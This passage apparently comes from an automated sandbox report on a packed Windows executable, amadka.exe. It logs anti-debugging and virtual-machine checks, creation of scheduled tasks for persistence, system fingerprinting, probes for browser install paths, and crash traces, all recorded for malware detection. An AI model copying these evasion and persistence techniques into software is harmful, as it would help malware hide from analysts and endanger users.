GetComputerNameW June 15, 2024, 8:21 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 15, 2024, 8:21 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 15, 2024, 8:22 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 15, 2024, 8:21 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 15, 2024, 8:21 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 15, 2024, 8:21 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 15, 2024, 8:21 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 15, 2024, 8:21 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 15, 2024, 8:21 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA June 15, 2024, 8:21 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 15, 2024, 8:21 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (50 out of 162 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent June 15, 2024, 8:20 a.m.			0	0
IsDebuggerPresent June 15, 2024, 8:20 a.m.			0	0
IsDebuggerPresent June 15, 2024, 8:20 a.m.			0	0
IsDebuggerPresent June 15, 2024, 8:20 a.m.			0	0
IsDebuggerPresent June 15, 2024, 8:21 a.m.			0	0
IsDebuggerPresent June 15, 2024, 8:21 a.m.			0	0
IsDebuggerPresent June 15, 2024, 8:21 a.m.			0	0
IsDebuggerPresent June 15, 2024, 8:21 a.m.			0	0
IsDebuggerPresent June 15, 2024, 8:21 a.m.			0	0
IsDebuggerPresent June 15, 2024, 8:21 a.m.			0	0
IsDebuggerPresent June 15, 2024, 8:21 a.m.			0	0
IsDebuggerPresent June 15, 2024, 8:21 a.m.			0	0
IsDebuggerPresent June 15, 2024, 8:21 a.m.			0	0
IsDebuggerPresent June 15, 2024, 8:21 a.m.			0	0
IsDebuggerPresent June 15, 2024, 8:21 a.m.			0	0
IsDebuggerPresent June 15, 2024, 8:21 a.m.			0	0
IsDebuggerPresent June 15, 2024, 8:21 a.m.			0	0
IsDebuggerPresent June 15, 2024, 8:21 a.m.			0	0
IsDebuggerPresent June 15, 2024, 8:21 a.m.			0	0
IsDebuggerPresent June 15, 2024, 8:21 a.m.			0	0
IsDebuggerPresent June 15, 2024, 8:21 a.m.			0	0
IsDebuggerPresent June 15, 2024, 8:21 a.m.			0	0
IsDebuggerPresent June 15, 2024, 8:21 a.m.			0	0
IsDebuggerPresent June 15, 2024, 8:21 a.m.			0	0
IsDebuggerPresent June 15, 2024, 8:21 a.m.			0	0
IsDebuggerPresent June 15, 2024, 8:21 a.m.			0	0
IsDebuggerPresent June 15, 2024, 8:21 a.m.			0	0
IsDebuggerPresent June 15, 2024, 8:21 a.m.			0	0
IsDebuggerPresent June 15, 2024, 8:21 a.m.			0	0
IsDebuggerPresent June 15, 2024, 8:21 a.m.			0	0
IsDebuggerPresent June 15, 2024, 8:21 a.m.			0	0
IsDebuggerPresent June 15, 2024, 8:21 a.m.			0	0
IsDebuggerPresent June 15, 2024, 8:21 a.m.			0	0
IsDebuggerPresent June 15, 2024, 8:22 a.m.			0	0
IsDebuggerPresent June 15, 2024, 8:22 a.m.			0	0
IsDebuggerPresent June 15, 2024, 8:22 a.m.			0	0
IsDebuggerPresent June 15, 2024, 8:22 a.m.			0	0
IsDebuggerPresent June 15, 2024, 8:22 a.m.			0	0
IsDebuggerPresent June 15, 2024, 8:22 a.m.			0	0
IsDebuggerPresent June 15, 2024, 8:22 a.m.			0	0
IsDebuggerPresent June 15, 2024, 8:22 a.m.			0	0
IsDebuggerPresent June 15, 2024, 8:22 a.m.			0	0
IsDebuggerPresent June 15, 2024, 8:22 a.m.			0	0
IsDebuggerPresent June 15, 2024, 8:22 a.m.			0	0
IsDebuggerPresent June 15, 2024, 8:22 a.m.			0	0
IsDebuggerPresent June 15, 2024, 8:22 a.m.			0	0
IsDebuggerPresent June 15, 2024, 8:22 a.m.			0	0
IsDebuggerPresent June 15, 2024, 8:22 a.m.			0	0
IsDebuggerPresent June 15, 2024, 8:22 a.m.			0	0
IsDebuggerPresent June 15, 2024, 8:22 a.m.			0	0

Command line console output was observed (50 out of 105 events)

Time & API	Arguments	Status	Return
WriteConsoleW June 15, 2024, 8:21 a.m.	buffer: SUCCESS: The scheduled task "MPGPH131 HR" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW June 15, 2024, 8:21 a.m.	buffer: SUCCESS: The scheduled task "MPGPH131 LG" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW June 15, 2024, 8:21 a.m.	buffer: SUCCESS: The scheduled task "NewKindR.exe" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW June 15, 2024, 8:21 a.m.	buffer: The operation completed successfully. console_handle: 0x00000007	1	1
WriteConsoleW June 15, 2024, 8:21 a.m.	buffer: The operation completed successfully. console_handle: 0x00000007	1	1
WriteConsoleW June 15, 2024, 8:21 a.m.	buffer: The operation completed successfully. console_handle: 0x00000007	1	1
WriteConsoleW June 15, 2024, 8:21 a.m.	buffer: The operation completed successfully. console_handle: 0x00000007	1	1
WriteConsoleA June 15, 2024, 8:21 a.m.	buffer: U console_handle: 0x00000007	1	1
WriteConsoleA June 15, 2024, 8:21 a.m.	buffer: p console_handle: 0x00000007	1	1
WriteConsoleA June 15, 2024, 8:21 a.m.	buffer: d console_handle: 0x00000007	1	1
WriteConsoleA June 15, 2024, 8:21 a.m.	buffer: a console_handle: 0x00000007	1	1
WriteConsoleA June 15, 2024, 8:21 a.m.	buffer: t console_handle: 0x00000007	1	1
WriteConsoleA June 15, 2024, 8:21 a.m.	buffer: i console_handle: 0x00000007	1	1
WriteConsoleA June 15, 2024, 8:21 a.m.	buffer: n console_handle: 0x00000007	1	1
WriteConsoleA June 15, 2024, 8:21 a.m.	buffer: g console_handle: 0x00000007	1	1
WriteConsoleA June 15, 2024, 8:21 a.m.	buffer: P console_handle: 0x00000007	1	1
WriteConsoleA June 15, 2024, 8:21 a.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA June 15, 2024, 8:21 a.m.	buffer: l console_handle: 0x00000007	1	1
WriteConsoleA June 15, 2024, 8:21 a.m.	buffer: i console_handle: 0x00000007	1	1
WriteConsoleA June 15, 2024, 8:21 a.m.	buffer: c console_handle: 0x00000007	1	1
WriteConsoleA June 15, 2024, 8:21 a.m.	buffer: y console_handle: 0x00000007	1	1
WriteConsoleA June 15, 2024, 8:21 a.m.	buffer: U console_handle: 0x00000007	1	1
WriteConsoleA June 15, 2024, 8:21 a.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA June 15, 2024, 8:21 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA June 15, 2024, 8:21 a.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA June 15, 2024, 8:21 a.m.	buffer: P console_handle: 0x00000007	1	1
WriteConsoleA June 15, 2024, 8:21 a.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA June 15, 2024, 8:21 a.m.	buffer: l console_handle: 0x00000007	1	1
WriteConsoleA June 15, 2024, 8:21 a.m.	buffer: i console_handle: 0x00000007	1	1
WriteConsoleA June 15, 2024, 8:21 a.m.	buffer: c console_handle: 0x00000007	1	1
WriteConsoleA June 15, 2024, 8:21 a.m.	buffer: y console_handle: 0x00000007	1	1
WriteConsoleA June 15, 2024, 8:21 a.m.	buffer: u console_handle: 0x00000007	1	1
WriteConsoleA June 15, 2024, 8:21 a.m.	buffer: p console_handle: 0x00000007	1	1
WriteConsoleA June 15, 2024, 8:21 a.m.	buffer: d console_handle: 0x00000007	1	1
WriteConsoleA June 15, 2024, 8:21 a.m.	buffer: a console_handle: 0x00000007	1	1
WriteConsoleA June 15, 2024, 8:21 a.m.	buffer: t console_handle: 0x00000007	1	1
WriteConsoleA June 15, 2024, 8:21 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA June 15, 2024, 8:21 a.m.	buffer: h console_handle: 0x00000007	1	1
WriteConsoleA June 15, 2024, 8:21 a.m.	buffer: a console_handle: 0x00000007	1	1
WriteConsoleA June 15, 2024, 8:21 a.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA June 15, 2024, 8:21 a.m.	buffer: c console_handle: 0x00000007	1	1
WriteConsoleA June 15, 2024, 8:21 a.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA June 15, 2024, 8:21 a.m.	buffer: m console_handle: 0x00000007	1	1
WriteConsoleA June 15, 2024, 8:21 a.m.	buffer: p console_handle: 0x00000007	1	1
WriteConsoleA June 15, 2024, 8:21 a.m.	buffer: l console_handle: 0x00000007	1	1
WriteConsoleA June 15, 2024, 8:21 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA June 15, 2024, 8:21 a.m.	buffer: t console_handle: 0x00000007	1	1
WriteConsoleA June 15, 2024, 8:21 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA June 15, 2024, 8:21 a.m.	buffer: d console_handle: 0x00000007	1	1
WriteConsoleA June 15, 2024, 8:21 a.m.	buffer: s console_handle: 0x00000007	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 57 events)

Time & API	Arguments	Status	Return
CryptExportKey June 15, 2024, 8:21 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x007fb200 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 15, 2024, 8:21 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x007fb200 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 15, 2024, 8:21 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x007fb200 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 15, 2024, 8:21 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x007fb200 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 15, 2024, 8:21 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x007fb280 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 15, 2024, 8:21 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x007fb280 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 15, 2024, 8:21 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x007fb180 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 15, 2024, 8:21 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x007fb180 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 15, 2024, 8:21 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x007fb180 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 15, 2024, 8:21 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x007fb180 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 15, 2024, 8:21 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x007fb180 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 15, 2024, 8:21 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x007fb200 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 15, 2024, 8:21 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x007fb200 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 15, 2024, 8:21 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x007fb400 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 15, 2024, 8:21 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x007fbcc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 15, 2024, 8:21 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x007fbcc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 15, 2024, 8:21 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x007fbb80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 15, 2024, 8:21 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00516928 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 15, 2024, 8:21 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00516ea8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 15, 2024, 8:21 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00516ea8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 15, 2024, 8:21 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00516ea8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 15, 2024, 8:21 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005170a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 15, 2024, 8:21 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005170a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 15, 2024, 8:21 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005170a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 15, 2024, 8:21 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005170a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 15, 2024, 8:21 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005170a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 15, 2024, 8:21 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005170a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 15, 2024, 8:21 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005168e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 15, 2024, 8:21 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005168e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 15, 2024, 8:21 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005168e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 15, 2024, 8:21 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00516ea8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 15, 2024, 8:21 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00516ea8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 15, 2024, 8:21 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00516ea8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 15, 2024, 8:21 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005164e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 15, 2024, 8:21 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00516ea8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 15, 2024, 8:21 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00516ea8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 15, 2024, 8:21 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00516ea8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 15, 2024, 8:21 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00516ea8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 15, 2024, 8:21 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00516ea8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 15, 2024, 8:21 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00516ea8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 15, 2024, 8:21 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00516ea8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 15, 2024, 8:21 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00517228 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 15, 2024, 8:21 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00517228 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 15, 2024, 8:21 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00517228 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 15, 2024, 8:21 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00517228 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 15, 2024, 8:21 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00517228 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 15, 2024, 8:21 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00517228 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 15, 2024, 8:21 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00517228 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 15, 2024, 8:21 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00517228 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 15, 2024, 8:21 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00517228 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Tries to locate where the browsers are installed (4 events)

file	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
file	C:\Program Files\Mozilla Firefox\firefox.exe
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe\PATH

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx June 15, 2024, 8:21 a.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (6 events)

section	\x00
section	.idata
section
section	gznyyhbr
section	jufnpfbp
section	.taggant

One or more processes crashed (50 out of 538 events)

Time & API	Arguments	Status
__exception__ June 15, 2024, 8:20 a.m.	stacktrace: RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: fb e9 4e 01 00 00 60 8b 74 24 24 8b 7c 24 28 fc exception.symbol: amadka+0x3120b9 exception.instruction: sti exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 3219641 exception.address: 0x11920b9 registers.esp: 2226260 registers.edi: 0 registers.eax: 1 registers.ebp: 2226276 registers.edx: 20119552 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0	1
__exception__ June 15, 2024, 8:20 a.m.	stacktrace: exception.instruction_r: fb 51 68 d3 15 e5 5f e9 22 03 00 00 ff 34 24 ff exception.symbol: amadka+0x6b31d exception.instruction: sti exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 439069 exception.address: 0xeeb31d registers.esp: 2226228 registers.edi: 1968898280 registers.eax: 15644713 registers.ebp: 4005662740 registers.edx: 0 registers.ebx: 238825 registers.esi: 3 registers.ecx: 1969094656	1
__exception__ June 15, 2024, 8:20 a.m.	stacktrace: exception.instruction_r: fb 57 51 e9 41 01 00 00 ff 34 24 58 53 89 14 24 exception.symbol: amadka+0x6c49d exception.instruction: sti exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 443549 exception.address: 0xeec49d registers.esp: 2226228 registers.edi: 1259 registers.eax: 32203 registers.ebp: 4005662740 registers.edx: 4294937496 registers.ebx: 238825 registers.esi: 15678280 registers.ecx: 349024689	1
__exception__ June 15, 2024, 8:20 a.m.	stacktrace: exception.instruction_r: fb e9 7a 00 00 00 81 c7 7f 60 e9 66 e9 95 00 00 exception.symbol: amadka+0x1ea506 exception.instruction: sti exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 2008326 exception.address: 0x106a506 registers.esp: 2226224 registers.edi: 15680323 registers.eax: 30815 registers.ebp: 4005662740 registers.edx: 17211979 registers.ebx: 417792 registers.esi: 17211421 registers.ecx: 2101608448	1
__exception__ June 15, 2024, 8:20 a.m.	stacktrace: exception.instruction_r: fb 55 c7 04 24 d3 8e 9c 5e 89 04 24 68 e6 b0 d1 exception.symbol: amadka+0x1ea487 exception.instruction: sti exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 2008199 exception.address: 0x106a487 registers.esp: 2226228 registers.edi: 4294939036 registers.eax: 30815 registers.ebp: 4005662740 registers.edx: 17242794 registers.ebx: 417792 registers.esi: 7596369 registers.ecx: 2101608448	1
__exception__ June 15, 2024, 8:20 a.m.	stacktrace: exception.instruction_r: fb 68 13 9d 74 78 89 3c 24 89 0c 24 89 1c 24 e9 exception.symbol: amadka+0x1f09d7 exception.instruction: sti exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 2034135 exception.address: 0x10709d7 registers.esp: 2226228 registers.edi: 96 registers.eax: 29475 registers.ebp: 4005662740 registers.edx: 96 registers.ebx: 17232994 registers.esi: 17266926 registers.ecx: 61024	1
__exception__ June 15, 2024, 8:20 a.m.	stacktrace: exception.instruction_r: fb ba d1 89 ef 57 57 bf 45 4d e2 6d 01 fa ff 34 exception.symbol: amadka+0x1f0689 exception.instruction: sti exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 2033289 exception.address: 0x1070689 registers.esp: 2226228 registers.edi: 134889 registers.eax: 29475 registers.ebp: 4005662740 registers.edx: 4294941088 registers.ebx: 17232994 registers.esi: 17266926 registers.ecx: 61024	1
__exception__ June 15, 2024, 8:20 a.m.	stacktrace: exception.instruction_r: fb 81 ec 04 00 00 00 89 04 24 b8 a1 66 ab 3f 29 exception.symbol: amadka+0x1f5ab5 exception.instruction: sti exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 2054837 exception.address: 0x1075ab5 registers.esp: 2226224 registers.edi: 4075032 registers.eax: 31660 registers.ebp: 4005662740 registers.edx: 1884690145 registers.ebx: 17232994 registers.esi: 17258399 registers.ecx: 1969148396	1
__exception__ June 15, 2024, 8:20 a.m.	stacktrace: exception.instruction_r: fb 53 c7 04 24 c0 72 66 4d 81 34 24 a3 1d ef 7b exception.symbol: amadka+0x1f5ee2 exception.instruction: sti exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 2055906 exception.address: 0x1075ee2 registers.esp: 2226228 registers.edi: 4075032 registers.eax: 31660 registers.ebp: 4005662740 registers.edx: 1884690145 registers.ebx: 17232994 registers.esi: 17290059 registers.ecx: 1969148396	1
__exception__ June 15, 2024, 8:20 a.m.	stacktrace: exception.instruction_r: fb 55 e9 07 fe ff ff bb db 81 95 05 e9 21 fd ff exception.symbol: amadka+0x1f6291 exception.instruction: sti exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 2056849 exception.address: 0x1076291 registers.esp: 2226228 registers.edi: 4075032 registers.eax: 1259 registers.ebp: 4005662740 registers.edx: 1884690145 registers.ebx: 17232994 registers.esi: 17261491 registers.ecx: 0	1
__exception__ June 15, 2024, 8:20 a.m.	stacktrace: exception.instruction_r: ed 64 8f 05 00 00 00 00 52 83 ec 04 89 24 24 81 exception.symbol: amadka+0x1fc852 exception.instruction: in eax, dx exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 2082898 exception.address: 0x107c852 registers.esp: 2226220 registers.edi: 4075032 registers.eax: 1447909480 registers.ebp: 4005662740 registers.edx: 22104 registers.ebx: 1969033397 registers.esi: 17273430 registers.ecx: 20	1
__exception__ June 15, 2024, 8:20 a.m.	stacktrace: exception.instruction_r: 0f 3f 07 0b 64 8f 05 00 00 00 00 83 c4 04 83 fb exception.symbol: amadka+0x1fdb74 exception.address: 0x107db74 exception.module: amadka.exe exception.exception_code: 0xc000001d exception.offset: 2087796 registers.esp: 2226220 registers.edi: 4075032 registers.eax: 1 registers.ebp: 4005662740 registers.edx: 22104 registers.ebx: 0 registers.esi: 17273430 registers.ecx: 20	1
__exception__ June 15, 2024, 8:20 a.m.	stacktrace: exception.instruction_r: ed 81 fb 68 58 4d 56 75 0a c7 85 0e 2a 2d 12 01 exception.symbol: amadka+0x1fb717 exception.instruction: in eax, dx exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 2078487 exception.address: 0x107b717 registers.esp: 2226220 registers.edi: 4075032 registers.eax: 1447909480 registers.ebp: 4005662740 registers.edx: 22104 registers.ebx: 2256917605 registers.esi: 17273430 registers.ecx: 10	1
__exception__ June 15, 2024, 8:20 a.m.	stacktrace: exception.instruction_r: fb e9 ca 03 00 00 35 5e 69 39 19 89 c7 58 56 be exception.symbol: amadka+0x2024a6 exception.instruction: sti exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 2106534 exception.address: 0x10824a6 registers.esp: 2226224 registers.edi: 4075032 registers.eax: 32169 registers.ebp: 4005662740 registers.edx: 2130566132 registers.ebx: 17309119 registers.esi: 10 registers.ecx: 2101608448	1
__exception__ June 15, 2024, 8:20 a.m.	stacktrace: exception.instruction_r: fb 81 ec 04 00 00 00 89 14 24 89 34 24 c7 04 24 exception.symbol: amadka+0x201fd8 exception.instruction: sti exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 2105304 exception.address: 0x1081fd8 registers.esp: 2226228 registers.edi: 4075032 registers.eax: 32169 registers.ebp: 4005662740 registers.edx: 2130566132 registers.ebx: 17341288 registers.esi: 10 registers.ecx: 2101608448	1
__exception__ June 15, 2024, 8:20 a.m.	stacktrace: exception.instruction_r: fb e9 1e fd ff ff be 06 eb 0f 32 e9 22 fd ff ff exception.symbol: amadka+0x20273c exception.instruction: sti exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 2107196 exception.address: 0x108273c registers.esp: 2226228 registers.edi: 4075032 registers.eax: 32169 registers.ebp: 4005662740 registers.edx: 4294938288 registers.ebx: 17341288 registers.esi: 10 registers.ecx: 584032	1
__exception__ June 15, 2024, 8:20 a.m.	stacktrace: exception.instruction_r: cd 01 eb 00 8b c8 6a 00 53 e8 03 00 00 00 20 5b exception.symbol: amadka+0x202c0d exception.instruction: int 1 exception.module: amadka.exe exception.exception_code: 0xc0000005 exception.offset: 2108429 exception.address: 0x1082c0d registers.esp: 2226188 registers.edi: 0 registers.eax: 2226188 registers.ebp: 4005662740 registers.edx: 13817 registers.ebx: 17313074 registers.esi: 17313074 registers.ecx: 3734886905	1
__exception__ June 15, 2024, 8:20 a.m.	stacktrace: exception.instruction_r: fb 83 ec 04 89 14 24 e9 22 00 00 00 31 fd 5f e9 exception.symbol: amadka+0x209ff7 exception.instruction: sti exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 2138103 exception.address: 0x1089ff7 registers.esp: 2226228 registers.edi: 0 registers.eax: 28067 registers.ebp: 4005662740 registers.edx: 654654 registers.ebx: 530300672 registers.esi: 604292945 registers.ecx: 17343193	1
__exception__ June 15, 2024, 8:20 a.m.	stacktrace: exception.instruction_r: fb 05 f2 62 7e 79 e9 f1 fc ff ff 81 c7 59 42 7e exception.symbol: amadka+0x212193 exception.instruction: sti exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 2171283 exception.address: 0x1092193 registers.esp: 2226224 registers.edi: 15638666 registers.eax: 17374095 registers.ebp: 4005662740 registers.edx: 6 registers.ebx: 38461049 registers.esi: 1968968720 registers.ecx: 0	1
__exception__ June 15, 2024, 8:20 a.m.	stacktrace: exception.instruction_r: fb 53 bb 61 d4 e7 7f 81 c3 a7 30 42 5c 81 f3 b4 exception.symbol: amadka+0x211c48 exception.instruction: sti exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 2169928 exception.address: 0x1091c48 registers.esp: 2226228 registers.edi: 4294938964 registers.eax: 17405078 registers.ebp: 4005662740 registers.edx: 6 registers.ebx: 38461049 registers.esi: 1968968720 registers.ecx: 262633	1
__exception__ June 15, 2024, 8:20 a.m.	stacktrace: exception.instruction_r: fb 29 d2 ff 34 1a ff 34 24 5f 83 ec 04 89 04 24 exception.symbol: amadka+0x2185b6 exception.instruction: sti exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 2196918 exception.address: 0x10985b6 registers.esp: 2226220 registers.edi: 4294938964 registers.eax: 32680 registers.ebp: 4005662740 registers.edx: 867346143 registers.ebx: 17431324 registers.esi: 1968968720 registers.ecx: 867346143	1
